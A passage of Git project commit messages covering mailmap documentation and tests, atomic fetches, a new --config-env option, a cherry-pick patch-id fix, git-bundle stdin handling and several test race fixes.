function to create_promisor_file().
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove support for the magical "repo-abbrev" comment in .mailmap
files. This was added to .mailmap parsing in [1], as a generalized
feature of the git-shortlog Perl script added earlier in [2].
There was no documentation or tests for this feature, and I don't
think it's used in practice anymore.
What it did was to allow you to specify a single string to be
search-replaced with "/.../" in the .mailmap file. E.g. for
linux.git's current .mailmap:
git archive --remote=git@gitlab.com:linux-kernel/linux.git \
HEAD -- .mailmap | grep -a repo-abbrev
# repo-abbrev: /pub/scm/linux/kernel/git/
Then when running e.g.:
git shortlog --merges --author=Linus -1 v5.10-rc7..v5.10 | grep Merge
We'd emit (the [...] is mine):
Merge tag [...]git://git.kernel.org/.../tip/tip
But will now emit:
Merge tag [...]git.kernel.org/pub/scm/linux/kernel/git/tip/tip
I think at this point this is just a historical artifact we can get
rid of. It was initially meant for Linus's own use when we integrated
the Perl script[2], but since then it seems he's stopped using it.
Digging through Linus's release announcements on the LKML[3] the last
release I can find that made use of this output is Linux 2.6.25-rc6
back in March 2008[4]. Later on Linus started using --no-merges[5],
and nowadays seems to prefer some custom not-quite-shortlog format of
merges from lieutenants[6].
You will still see it on linux.git if you run "git shortlog" manually
yourself with --merges, with this removed you can still get the same
output with:
git log --pretty=fuller v5.10-rc7..v5.10 |
sed 's!/pub/scm/linux/kernel/git/!/.../!g' |
git shortlog
Arguably we should do the same for the search-replacing of "[PATCH]"
at the beginning with "". That seems to be another relic of a bygone
era when linux.git patches would have their E-Mail subject lines
applied as-is by "git am" or whatever. But we documented that feature
in "git-shortlog(1)", and it seems more widely applicable than
something purely kernel-specific.
1. 7595e2ee6e (git-shortlog: make common repository prefix
configurable with .mailmap, 2006-11-25)
2. fa375c7f1b (Add git-shortlog perl script, 2005-06-04)
3. https://lore.kernel.org/lkml/
4. https://lore.kernel.org/lkml/alpine.LFD.1.00.0803161651350.3020@woody.linux-foundation.org/
5. https://lore.kernel.org/lkml/BANLkTinrbh7Xi27an3uY7pDWrNKhJRYmEA@mail.gmail.com/
6. https://lore.kernel.org/lkml/CAHk-=wg1+kf1AVzXA-RQX0zjM6t9J2Kay9xyuNqcFHWV-y5ZYw@mail.gmail.com/
Acked-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add documentation and more tests for case-insensitivity. The existing
test only matched on the E-Mail part, but as shown here we also match
the name with strcasecmp().
This behavior was last discussed on the mailing list in the thread
starting at [1]. It seems we're keeping it like this, so let's
document it.
1. https://lore.kernel.org/git/87czykvg19.fsf@evledraar.gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests for mailmap's handling of "<>", which is allowed on the RHS,
but not the LHS of a "<LHS> <RHS>" pair.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests for mailmap's handling of whitespace, i.e. how it trims
space within "<>" and around author names.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the mailmap documentation added in 0925ce4d49 (Add map_user()
and clear_mailmap() to mailmap, 2009-02-08) to continue discussing the
Jane/Joe example. I think this makes things a lot less confusing as
we're building up more complex examples using one set of data which
covers all the things we'd like to discuss.
Also add tests to assert that what our documentation says is what's
actually happening. This is mostly (or entirely) covered by existing
tests which I'm not deleting, but having these tests for the synopsis
makes it easier to follow-along while reading the tests & docs.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor a few more tests to use the new "--append" option to
"test_commit". I added it for use in the mailmap tests, but this
demonstrates how useful it is in general.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add an --append option to test_commit to append <contents> to the
<file> we're writing to. This simplifies a lot of test setup, as shown
in some of the tests being changed here.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add support for --author to "test_commit". This will simplify some
current and future tests, one of those is being changed here.
Let's also line-wrap the "git commit" command invocation to make diffs
that add subsequent options easier to add, as they'll only need to add
a new option line.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --notick argument was added in [1] and was followed by --signoff
in [2], but neither of these commits added any documentation for these
options. When -C was added in [3] a comment was added to document it,
but not the other options. Let's document all of these options.
1. 44b85e89d7 (t7003: add test to filter a branch with a commit at
epoch, 2012-07-12),
2. 5ed75e2a3f (cherry-pick: don't forget -s on failure, 2012-09-14).
3. 6f94351b0a (test-lib-functions.sh: teach test_commit -C <dir>,
2016-12-08)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Expand the comment template for "test_commit" to match that of
"test_commit_bulk" added in b1c36cb849 (test-lib: introduce
test_commit_bulk, 2019-07-02). It has several undocumented options,
which won't all fit on one line. Follow-up commit(s) will document
them.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
That we silently ignore missing mailmap.file or mailmap.blob values is
intentional. See 938a60d64f (mailmap: clean up read_mailmap error
handling, 2012-12-12). However, nothing tested for this. Let's do that
by checking that stderr is empty in those cases.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change a test that used a custom fuzzing function since
bfdfa3d414 (t4203 (mailmap): stop hardcoding commit ids and dates,
2010-10-15) to just use the "blame --porcelain" output instead.
We could use the same pattern as 0ba9c9a0fb (t8008: rely on
rev-parse'd HEAD instead of sha1 value, 2017-07-26) does to do this,
but there wouldn't be any point. We're not trying to test "blame"
output here in general, just that "blame" pays attention to the
mailmap.
So it's sufficient to get the blamed line(s) and authors from the
output, which is much easier with the "--porcelain" option.
It would still be possible for there to be a bug in "blame" such that
it uses the mailmap for its "--porcelain" output, but not the regular
output. Let's test for that simply by checking if specifying the
mailmap changes the output.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a test for one of the error conditions added in
938a60d64f (mailmap: clean up read_mailmap error handling,
2012-12-12).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove a redundant line in a test added in d20d654fe8 (Change current
mailmap usage to do matching on both name and email of
author/committer., 2009-02-08).
This didn't conceivably test anything useful and is most likely a
copy/paste error.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --stdin tests setup the "contact" file in the main setup, let's
instead set it up in the test that uses it.
Also refactor the first test so it's obvious that the point of it is
that "check-mailmap" will spew its input as-is when given no
argument. For that one we can just use the "expect" file as-is.
Also add tests for how other "--stdin" cases are handled, e.g. one
where we actually do a mapping.
For the rest of --stdin testing we just assume we're going to get the
same output. We could follow-up and make sure everything's
round-tripped through both --stdin and the file/blob backends, but I
don't think there's much point in that.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor the mailmap tests to:
* Setup "actual" test files in the body of "test_expect_success"
* Don't have X of "test_expect_success X Y" be an unquoted string.
* Not to carry over test config between tests, and instead use
"test_config".
* Replace various "echo" a line-at-a-time patterns with here-docs.
* Change a case of "log.mailmap=False" to use the lower-case
"false". Both work, but this ends up in git-config's boolean
parsing and these atypical values are tested for elsewhere. Let's
use the lower-case to not draw the reader's attention to this
abnormality.
* Remove commentary asserting that things work a given way in favor
of simply testing for it, i.e. in the case of a .mailmap file
outside of the repository.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change these tests to use the preferred whitespace around ">",
"<<-EOF" etc. This is an initial step in larger and more meaningful
refactoring of the file, which makes a subsequent commit easier to
read.
I'm not changing the whitespace of "echo <str> > file" patterns to
"echo <str> >file" because all of those will be changed to here-docs
in a subsequent commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Mentioning the comment syntax and blank line support first is in line
with how "git help config" describes its format. See
b8936cf060 (config.txt grammar, typo, and asciidoc fixes, 2006-06-08)
for the paragraph I'm copying & amending from its documentation.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a passing mention of the mailmap.file and mailmap.blob
configuration options. Before this addition a reader of the
"check-mailmap" manpage would have no idea that a custom map could be
specified, unless they'd happen to e.g. come across it in the "config"
manpage first.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Quote the mailmap.file and mailmap.blob configuration variables as
`mailmap.file` and `mailmap.blob`, and link to git-config(1). This is
in line with the preferred way of doing this in the rest of our
documentation.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Create a gitmailmap(5) page similar to how .gitmodules and .gitignore
have their own pages at gitmodules(5) and gitignore(5). Now instead of
"check-mailmap", "blame" and "shortlog" documentation including the
description of the format we link to one canonical place.
This makes things easier for readers, since in our manpage or
web-based[1] output it's not clear that the "MAPPING AUTHORS" sections
aren't subtly different, as opposed to just included.
1. https://git-scm.com/docs/git-check-mailmap
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When executing a fetch, then git will currently allocate one reference
transaction per reference update and directly commit it. This means that
fetches are non-atomic: even if some of the reference updates fail,
others may still succeed and modify local references.
This is fine in many scenarios, but this strategy has its downsides.
- The view of remote references may be inconsistent and may show a
bastardized state of the remote repository.
- Batching together updates may improve performance in certain
scenarios. While the impact probably isn't as pronounced with loose
references, the upcoming reftable backend may benefit as it needs to
write less files in case the update is batched.
- The reference-update hook is currently being executed twice per
updated reference. While this doesn't matter when there is no such
hook, we have seen severe performance regressions when doing a
git-fetch(1) with reference-transaction hook when the remote
repository has hundreds of thousands of references.
Similar to `git push --atomic`, this commit thus introduces atomic
fetches. Instead of allocating one reference transaction per updated
reference, it causes us to only allocate a single transaction and commit
it as soon as all updates were received. If locking of any reference
fails, then we abort the complete transaction and don't update any
reference, which gives us an all-or-nothing fetch.
Note that this may not completely fix the first of above downsides, as
the consistent view also depends on the server-side. If the server
doesn't have a consistent view of its own references during the
reference negotiation phase, then the client would get the same
inconsistent view the server has. This is a separate problem though and,
if it actually exists, can be fixed at a later point.
This commit also changes the way we write FETCH_HEAD in case `--atomic`
is passed. Instead of writing changes as we go, we need to accumulate
all changes first and only commit them at the end when we know that all
reference updates succeeded. Ideally, we'd just do so via a temporary
file so that we don't need to carry all updates in-memory. This isn't
trivially doable though considering the `--append` mode, where we do not
truncate the file but simply append to it. And given that we support
concurrent processes appending to FETCH_HEAD at the same time without
any loss of data, seeding the temporary file with current contents of
FETCH_HEAD initially and then doing a rename wouldn't work either. So
this commit implements the simple strategy of buffering all changes and
appending them to the file on commit.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The handling of ref updates is completely handled by `s_update_ref()`,
which will manage the complete lifecycle of the reference transaction.
This is fine right now given that git-fetch(1) does not support atomic
fetches, so each reference gets its own transaction. It is quite
inflexible though, as `s_update_ref()` only knows about a single
reference update at a time, so it doesn't allow us to alter the
strategy.
This commit prepares `s_update_ref()` and its only caller
`update_local_ref()` to allow passing an external transaction. If none
is given, then the existing behaviour is triggered which creates a new
transaction and directly commits it. Otherwise, if the caller provides a
transaction, then we only queue the update but don't commit it. This
optionally allows the caller to manage when a transaction will be
committed.
Given that `update_local_ref()` is always called with a `NULL`
transaction for now, no change in behaviour is expected from this
change.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The cleanup code in `s_update_ref()` is currently duplicated for both
succesful and erroneous exit paths. This commit refactors the function
to have a shared exit path for both cases to remove the duplication.
Suggested-by: Christian Couder <christian.couder@gmail.com>
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This commit refactors `append_fetch_head()` to use a `struct strbuf` for
formatting the update which we're about to append to the FETCH_HEAD
file. While the refactoring doesn't have much of a benefit right now, it
serves as a preparatory step to implement atomic fetches where we need
to buffer all updates to FETCH_HEAD and only flush them out if all
reference updates succeeded.
No change in behaviour is expected from this commit.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When performing a fetch with the default `--write-fetch-head` option, we
write all updated references to FETCH_HEAD while the updates are
performed. Given that updates are not performed atomically, it means
that we we write to FETCH_HEAD even if some or all of the reference
updates fail.
Given that we simply update FETCH_HEAD ad-hoc with each reference, the
logic is completely contained in `store_update_refs` and thus quite hard
to extend. This can already be seen by the way we skip writing to the
FETCH_HEAD: instead of having a conditional which simply skips writing,
we instead open "/dev/null" and needlessly write all updates there.
We are about to extend git-fetch(1) to accept an `--atomic` flag which
will make the fetch an all-or-nothing operation with regards to the
reference updates. This will also require us to make the updates to
FETCH_HEAD an all-or-nothing operation, but as explained doing so is not
easy with the current layout. This commit thus refactors the wa we write
to FETCH_HEAD and pulls out the logic to open, append to, commit and
close the file. While this may seem rather over-the top at first,
pulling out this logic will make it a lot easier to update the code in a
subsequent commit. It also allows us to easily skip writing completely
in case `--no-write-fetch-head` was passed.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The function `git_config_parse_parameter` is responsible for parsing a
`foo.bar=baz`-formatted configuration key, sanitizing the key and then
processing it via the given callback function. Given that we're about to
add a second user which is going to process keys which already has keys
and values separated, this commit extracts a function
`config_parse_pair` which only does the sanitization and processing
part as a preparatory step.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We provide a function for dequoting an entire string, as well as one for
handling a space-separated list of quoted strings. But there's no way
for a caller to parse a string like 'foo'='bar', even though it is easy
to generate one using sq_quote_buf() or similar.
Let's make the single-step function available to callers outside of
quote.c. Note that we do need to adjust its implementation slightly: it
insists on seeing whitespace between items, and we'd like to be more
flexible than that. Since it only has a single caller, we can move that
check (and slurping up any extra whitespace) into that caller.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While it's already possible to pass runtime configuration via `git -c
<key>=<value>`, it may be undesirable to use when the value contains
sensitive information. E.g. if one wants to set `http.extraHeader` to
contain an authentication token, doing so via `-c` would trivially leak
those credentials via e.g. ps(1), which typically also shows command
arguments.
To enable this usecase without leaking credentials, this commit
introduces a new switch `--config-env=<key>=<envvar>`. Instead of
directly passing a value for the given key, it instead allows the user
to specify the name of an environment variable. The value of that
variable will then be used as value of the key.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This fixes a bug introduced in dfb7a1b4d0 (patch-ids: stop using a
hand-rolled hashmap implementation, 2016-07-29) in which
git rev-list --cherry-pick A...B
will fail to suppress commits reachable from A even if a commit with
matching patch-id appears in B.
Around the time of that commit, the algorithm for "--cherry-pick" looked
something like this:
0. Traverse all of the commits, marking them as being on the left or
right side of the symmetric difference.
1. Iterate over the left-hand commits, inserting a patch-id struct for
each into a hashmap, and pointing commit->util to the patch-id
struct.
2. Iterate over the right-hand commits, checking which are present in
the hashmap. If so, we exclude the commit from the output _and_ we
mark the patch-id as "seen".
3. Iterate again over the left-hand commits, checking whether
commit->util->seen is set; if so, exclude them from the output.
At the end, we'll have eliminated commits from both sides that have a
matching patch-id on the other side. But there's a subtle assumption
here: for any given patch-id, we must have exactly one struct
representing it. If two commits from A both have the same patch-id and
we allow duplicates in the hashmap, then we run into a problem:
a. In step 1, we insert two patch-id structs into the hashmap.
b. In step 2, our lookups will find only one of these structs, so only
one "seen" flag is marked.
c. In step 3, one of the commits in A will have its commit->util->seen
set, but the other will not. We'll erroneously output the latter.
Prior to dfb7a1b4d0, our hashmap did not allow duplicates. Afterwards,
it used hashmap_add(), which explicitly does allow duplicates.
At that point, the solution would have been easy: when we are about to
add a duplicate, skip doing so and return the existing entry which
matches. But it gets more complicated.
In 683f17ec44 (patch-ids: replace the seen indicator with a commit
pointer, 2016-07-29), our step 3 goes away entirely. Instead, in step 2,
when the right-hand side finds a matching patch_id from the left-hand
side, we can directly mark the left-hand patch_id->commit to be omitted.
Solving that would be easy, too; there's a one-to-many relationship of
patch-ids to commits, so we just need to keep a list.
But there's more. Commit b3dfeebb92 (rebase: avoid computing unnecessary
patch IDs, 2016-07-29) built on that by lazily computing the full
patch-ids. So we don't even know when adding to the hashmap whether two
commits truly have the same id. We'd have to tentatively assign them a
list, and then possibly split them apart (possibly into N new structs)
at the moment we compute the real patch-ids. This could work, but it's
complicated and error-prone.
Instead, let's accept that we may store duplicates, and teach the lookup
side to be more clever. Rather than asking for a single matching
patch-id, it will need to iterate over all matching patch-ids. This does
mean examining every entry in a single hash bucket, but the worst-case
for a hash lookup was already doing that.
We'll keep the hashmap details out of the caller by providing a simple
iteration interface. We can retain the simple has_commit_patch_id()
interface for the other callers, but we'll simplify its return value
into an integer, rather than returning the patch_id struct. That way
they won't be tempted to look at the "commit" field of the return value
without iterating.
Reported-by: Arnaud Morin <arnaud.morin@gmail.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When running 'git clone --local', the operation may fail if another
process is modifying the source repository. Document that this race
condition is known to hopefully help anyone who may run into it.
Suggested-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to create an incremental bundle, we need to pass many arguments
to let git-bundle ignore some already packed commits. It will be more
convenient to pass args via stdin. But the current implementation does
not allow us to do this.
This is because args are parsed twice when creating bundle. The first
time for parsing args is in `compute_and_write_prerequisites()` by
running `git-rev-list` command to write prerequisites in bundle file,
and stdin is consumed in this step if "--stdin" option is provided for
`git-bundle`. Later nothing can be read from stdin when running
`setup_revisions()` in `create_bundle()`.
The solution is to parse args once by removing the entire function
`compute_and_write_prerequisites()` and then calling function
`setup_revisions()`. In order to write prerequisites for bundle, will
call `prepare_revision_walk()` and `traverse_commit_list()`. But after
calling `prepare_revision_walk()`, the object array `revs.pending` is
left empty, and the following steps could not work properly with the
empty object array (`revs.pending`). Therefore, make a copy of `revs`
to `revs_copy` for later use right after calling `setup_revisions()`.
The copy of `revs_copy` is not a deep copy, it shares the same objects
with `revs`. The object array of `revs` has been cleared, but objects
themselves are still kept. Flags of objects may change after calling
`prepare_revision_walk()`, we can use these changed flags without
calling the `git rev-list` command and parsing its output like the
former implementation.
Also add testcases for git bundle in t6020, which read args from stdin.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git rev-list` will list one commit for the following command:
$ git rev-list 'main^!'
<tip-commit-of-main-branch>
But providing the same rev-list args to `git bundle`, fail to create
a bundle file.
$ git bundle create - 'main^!'
# v2 git bundle
-<OID> <one-line-message>
fatal: Refusing to create empty bundle.
This is because when removing duplicate objects in function
`object_array_remove_duplicates()`, one unique pending object which has
the same name is deleted by mistake. The revision arg 'main^!' in the
above example is parsed by `handle_revision_arg()`, and at lease two
different objects will be appended to `revs.pending`, one points to the
parent commit of the "main" branch, and the other points to the tip
commit of the "main" branch. These two objects have the same name
"main". Only one object is left with the name "main" after calling the
function `object_array_remove_duplicates()`.
And what's worse, when adding boundary commits into pending list, we use
one-line commit message as names, and the arbitory names may surprise
git-bundle.
Only comparing objects themselves (".item") is also not good enough,
because user may want to create a bundle with two identical objects but
with different reference names, such as: "HEAD" and "refs/heads/main".
Add new function `contains_object()` which compare both the address and
the name of the object.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move git-bundle related functions from t5510 to a library, and this lib
will be shared with a new testcase t6020 which finds a known breakage of
"git-bundle".
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This sequence works
$ git checkout -b newbranch
$ git commit --allow-empty -m one
$ git show -s newbranch@{1}
and shows the state that was immediately after the newbranch was
created.
But then if you do
$ git reflog expire --expire=now refs/heads/newbranch
$ git commit --allow=empty -m two
$ git show -s newbranch@{1}
you'd be scolded with
fatal: log for 'newbranch' only has 1 entries
While it is true that it has only 1 entry, we have enough
information in that single entry that records the transition between
the state in which the tip of the branch was pointing at commit
'one' to the new commit 'two' built on it, so we should be able to
answer "what object newbranch was pointing at?". But we refuse to
do so.
Make @{0} the special case where we use the new side to look up that
entry. Otherwise, look up @{n} using the old side of the (n-1)th entry
of the reflog.
Suggested-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Mostly remove the comment I added 5e9637c629 (i18n: add
infrastructure for translating Git with gettext, 2011-11-18). Since
then we had a fix in 9c0495d23e (gettext.c: detect the vsnprintf bug
at runtime, 2013-12-01) so we're not running with the "set back to C
locale" hack on any modern system.
So having more than 1/4 of the file taken up by a digression about a
glibc bug that mostly doesn't happen to anyone anymore is just a
needless distraction. Shorten the comment to make a brief mention of
the bug, and where to find more info by looking at the git history for
this now-removed comment.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove a migratory warning I added in 6cdccfce1e (i18n: make
GETTEXT_POISON a runtime option, 2018-11-08) to give anyone using that
option in their builds a heads-up about the change from compile-time
to runtime introduced in that commit.
It's been more than 2 years since then, anyone who ran into this is
likely to have made a change as a result, so removing this is long
overdue.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The table describing the porcelain format in git-status(1) is helpful,
but it's not completely clear what the three sections mean, even to
some contributors. As a result, users are unable to find how to detect
common cases like merge conflicts programmatically.
Let's improve this situation by rephrasing to be more explicit about
what each of the sections in the table means, to tell users in plain
language which cases are occurring, and to describe what "unmerged"
means.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This block of code is duplicated twice. In a future commit, it will be
duplicated for a third time. Factor out the common functionality into
set_read_ref_cutoffs().
In the case of read_ref_at_ent(), we are incrementing `cb->reccnt` at the
beginning of the function. Move these to right before the return so that
the `cb->reccnt - 1` is changed to `cb->reccnt` and it can be cleanly
factored out into set_read_ref_cutoffs(). The duplication of the
increment statements will be removed in a future patch.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"directory cache" (or "directory cache index", "cache") are obsolete
terms which have been superseded by "index". Keeping them in the
documentation may be a source of confusion. This commit replaces
them with the current term, "index", on man pages.
Signed-off-by: Utku Gultopu <ugultopu@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 014ade7484 (upload-pack: send ERR packet for non-tip objects,
2019-04-13) added a test that greps the output of a failed fetch to make
sure that upload-pack sent us the ERR packet we expected. But checking
this is racy; despite the argument in that commit, the client may still
be sending a "done" line after the server exits, causing it to die() on
a failed write() and never see the ERR packet at all.
This fails quite rarely on Linux, but more often on macOS. However, it
can be triggered reliably with:
diff --git a/fetch-pack.c b/fetch-pack.c
index 876f90c759..cf40de9092 100644
--- a/fetch-pack.c
+++ b/fetch-pack.c
@@ -489,6 +489,7 @@ static int find_common(struct fetch_negotiator *negotiator,
done:
trace2_region_leave("fetch-pack", "negotiation_v0_v1", the_repository);
if (!got_ready || !no_done) {
+ sleep(1);
packet_buf_write(&req_buf, "done\n");
send_request(args, fd[1], &req_buf);
}
This is a real user-visible race that it would be nice to fix, but it's
tricky to do so: the client would have to speculatively try to read an
ERR packet after hitting a write() error. And at least for this error,
it's specific to v0 (since v2 does not enforce reachability at all).
So let's loosen the test to avoid annoying racy failures. If we
eventually do the read-after-failed-write thing, we can tighten it. And
if not, v0 will grow increasingly obsolete as servers support v2, so the
utility of this test will decrease over time anyway.
Note that we can still check stderr to make sure upload-pack bailed for
the reason we expected. It writes a similar message to stderr, and
because the server side is just another process connected by pipes,
we'll reliably see it. This would not be the case for git://, or for
ssh servers that do not relay stderr (e.g., GitHub's custom endpoint
does not).
Helped-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When running this test in Cygwin, it's necessary to remove the inherited
access control lists from the Git working directory in order for later
permissions tests to work as expected.
As such, fix an error in the test script so that the ACLs are set for
the working directory, not a nonexistent subdirectory.
Signed-off-by: Adam Dinwoodie <adam@dinwoodie.org>
Reviewed-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a bunch of test cases in 't7800-difftool.sh' we 'grep' for specific
filenames in 'git difftool's output, and those test cases are prone to
occasional failures because those filenames might be part of the name
of difftool's temporary directory as well, e.g.:
+git difftool --dir-diff --no-symlinks --extcmd ls v1
+grep sub output
+test_line_count = 2 sub-output
test_line_count: line count for sub-output != 2
/tmp/git-difftool.Ssubfq/left/:
sub
/tmp/git-difftool.Ssubfq/right/:
sub
error: last command exited with $?=1
not ok 50 - difftool --dir-diff v1 from subdirectory --no-symlinks
Fix this by tightening the 'grep' patterns looking for those
interesting filenames to match only lines where a filename stands on
its own.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Google may have changed Gmail security and now less secure app access
needs to be explicitly enabled if two-factor authentication is not in
place, otherwise send-email fails with:
5.7.8 Username and Password not accepted. Learn more at
5.7.8 https://support.google.com/mail/?p=BadCredentials
Document steps required to make this work.
Signed-off-by: Vasyl Vavrychuk <vvavrychuk@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
[dl: Clean up commit message and incorporate suggestions into patch.]
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git for-each-repo --config=X' should return success without calling any
subcommands when the config key 'X' has no value. The current
implementation instead segfaults.
A user could run into this issue if they used 'git maintenance start' to
initialize their cron schedule using 'git for-each-repo
--config=maintenance.repo ...' but then using 'git maintenance
unregister' to remove the config option. (Note: 'git maintenance stop'
would remove the config _and_ remove the cron schedule.)
Add a simple test to ensure this works. Use 'git help --no-such-option'
as the potential subcommand to ensure that we will hit a failure if the
subcommand is ever run.
Reported-by: Andreas Bühmann <dev@uuml.de>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The text says "if you can certify DCO then you add a Signed-off-by
trailer". But it does not say anything about people who cannot or
do not want to certify. A natural reading may be that if you do not
certify, you must not add the trailer, but it shouldn't hurt to be
overly explicit.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the output of the likes of "git branch -l --sort=-objectsize"
to show the "(HEAD detached at <hash>)" message at the start of the
output. Before the compare_detached_head() function added in a
preceding commit we'd emit this output as an emergent effect.
It doesn't make any sense to consider the objectsize, type or other
non-attribute of the "(HEAD detached at <hash>)" message for the
purposes of sorting. Let's always emit it at the top instead. The only
reason it was sorted in the first place is because we're injecting it
into the ref-filter machinery so builtin/branch.c doesn't need to do
its own "am I detached?" detection.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the ref-filter sorting of detached HEAD to check the
FILTER_REFS_DETACHED_HEAD flag, instead of relying on the ref
description filled-in by get_head_description() to start with "(",
which in turn we expect to ASCII-sort before any other reference.
For context, we'd like the detached line to appear first at the start
of "git branch -l", e.g.:
$ git branch -l
* (HEAD detached at <hash>)
master
This doesn't change that, but improves on a fix made in
28438e84e0 (ref-filter: sort detached HEAD lines firstly, 2019-06-18)
and gives the Chinese translation the ability to use its preferred
punctuation marks again.
In Chinese the fullwidth versions of punctuation like "()" are
typically written as (U+FF08 fullwidth left parenthesis), (U+FF09
fullwidth right parenthesis) instead[1]. This form is used in both
po/zh_{CN,TW}.po in most cases where "()" is translated in a string.
Aside from that improvement to the Chinese translation, it also just
makes for cleaner code that we mark any special cases in the ref_array
we're sorting with flags and make the sort function aware of them,
instead of piggy-backing on the general-case of strcmp() doing the
right thing.
As seen in the amended tests this made reverse sorting a bit more
consistent. Before this we'd sometimes sort this message in the
middle, now it's consistently at the beginning or end, depending on
whether we're doing a normal or reverse sort. Having it at the end
doesn't make much sense either, but at least it behaves consistently
now. A follow-up commit will make this behavior under reverse sorting
even better.
I'm removing the "TRANSLATORS" comments that were in the old code
while I'm at it. Those were added in d4919bb288 (ref-filter: move
